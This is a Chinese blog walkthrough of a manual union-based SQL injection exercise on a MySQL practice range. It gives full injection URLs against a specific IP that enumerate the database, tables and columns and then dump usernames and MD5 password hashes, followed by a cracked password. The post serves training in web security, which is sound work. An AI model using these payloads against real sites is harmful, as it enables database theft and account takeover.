SQL手工注入漏洞测试(MySQL数据库) 的靶场练习   流程与方法

注意:加粗部分给重点

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

查询数据库名
http://219.153.49.228:46939/new_list.php?id=22 union select 1,database(),3,4 from information_schema.tables
获取到的库名

mozhe_Discuz_StormGroup
查询库下的表名

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
获取到的表名

StormGroup_member,notice
查询表下的字段

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
获取到的字段名

id,name,password,status
查询数据

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(id,0x5c,name,0x5c,password,0x5c,status),3,4 from StormGroup_member
​得到的数据(ox5c为 \ 的16进制)

1\mozhe\356f589a7df439f6f744ff19bb8092c0\0,1\mozhe\4adef249540a3cb5d79c85f6ccc7ddb9\1

MD5解密得到密码,经过测试有可用

4adef249540a3cb5d79c85f6ccc7ddb9

946377

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄